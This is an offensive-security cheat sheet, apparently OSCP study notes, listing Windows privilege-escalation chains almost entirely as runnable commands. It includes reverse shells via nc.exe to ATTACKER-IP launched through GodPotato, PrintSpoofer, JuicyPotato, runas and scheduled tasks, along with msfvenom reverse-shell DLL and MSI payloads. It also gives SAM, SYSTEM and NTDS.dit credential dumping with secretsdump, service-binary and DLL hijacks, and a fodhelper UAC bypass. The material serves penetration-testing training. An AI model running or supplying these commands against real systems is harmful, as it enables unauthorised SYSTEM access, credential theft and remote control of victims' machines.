// notes/ PrivEsc — Windows
🧭
Windows PrivEsc Attack Chain
Ordered decision tree for Windows privilege escalation.
#windows#privesc#methodology
source · airouboss/oscp-prep-notes-2026 · methodology/attack-chains/windows-privesc.md ↗Windows Privesc Chains
SeImpersonate → GodPotato/PrintSpoofer → SYSTEM
powershell
$# Check: whoami /priv → SeImpersonatePrivilege$.\GodPotato.exe -cmd "cmd /c C:\temp\nc.exe ATTACKER-IP 443 -e cmd"$# Or:$.\PrintSpoofer.exe -i -c "cmd /c C:\temp\nc.exe ATTACKER-IP 443 -e cmd"SeBackup → SAM+SYSTEM dump → secretsdump → admin hash
powershell
$# Check: whoami /priv → SeBackupPrivilege$reg save hklm\sam C:\temp\sam$reg save hklm\system C:\temp\system$# Transfer to attacker:$impacket-secretsdump -sam sam -system system LOCALBackup Operators → NTDS.dit → secretsdump
powershell
$# Member of Backup Operators group$# Use diskshadow to copy NTDS.dit:$diskshadow /s script.txt$robocopy /b E:\Windows\NTDS . ntds.dit$reg save hklm\system C:\temp\system$# Transfer and extract:$impacket-secretsdump -ntds ntds.dit -system system LOCALService Binary Hijack → restart → SYSTEM
powershell
$# Find writable service binary path:$icacls "C:\Program Files\VulnSvc\service.exe"$# Replace with payload:$copy C:\temp\rev.exe "C:\Program Files\VulnSvc\service.exe"$sc stop VulnSvc && sc start VulnSvcUnquoted Service Path → drop binary → SYSTEM
powershell
$# Find unquoted paths:$wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows"$# Example path: C:\Program Files\Vuln App\service.exe$# Drop binary at: C:\Program Files\Vuln.exe$copy C:\temp\rev.exe "C:\Program Files\Vuln.exe"$sc stop VulnSvc && sc start VulnSvcDLL Hijacking
powershell
$# Use procmon to find missing DLLs loaded by a service/app$# Craft DLL with msfvenom:$msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER-IP LPORT=443 -f dll -o hijack.dll$# Place in writable directory that's in DLL search order$# Restart service or wait for triggerAlwaysInstallElevated → msi payload → SYSTEM
powershell
$# Check both keys (both must be 1):$reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated$reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated$# Generate MSI:$msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER-IP LPORT=443 -f msi -o shell.msi$msiexec /quiet /qn /i shell.msiRunAs with Saved Credentials
powershell
$cmdkey /list$# If creds are saved:$runas /savecred /user:Administrator "cmd /c C:\temp\nc.exe ATTACKER-IP 443 -e cmd"Token Impersonation with Incognito
powershell
$# In Meterpreter:$load incognito$list_tokens -u$impersonate_token "DOMAIN\\Administrator"$# Or standalone:$.\incognito.exe list_tokens -u$.\incognito.exe execute -c "DOMAIN\Administrator" cmd.exeScheduled Task Abuse
powershell
$# Find writable scheduled task scripts:$schtasks /query /fo LIST /v | findstr /i "Task To Run"$icacls "C:\path\to\task_script.bat"$# Replace script content with reverse shell$echo C:\temp\nc.exe ATTACKER-IP 443 -e cmd > "C:\path\to\task_script.bat"Registry AutoRun Exploitation
powershell
$# Check for writable AutoRun entries:$reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run$icacls "C:\Program Files\AutoRunApp\app.exe"$# Replace with payload, wait for admin login$copy C:\temp\rev.exe "C:\Program Files\AutoRunApp\app.exe"UAC Bypass
powershell
$# fodhelper.exe bypass:$New-Item -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force$Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(default)" -Value "cmd /c C:\temp\rev.exe"$New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value ""$Start-Process fodhelper.exeJuicyPotato / RoguePotato / SweetPotato
powershell
$# SeImpersonate or SeAssignPrimaryToken required$# JuicyPotato (older Windows):$.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c C:\temp\nc.exe ATTACKER-IP 443 -e cmd" -t *$# SweetPotato (modern):$.\SweetPotato.exe -a "cmd /c C:\temp\nc.exe ATTACKER-IP 443 -e cmd"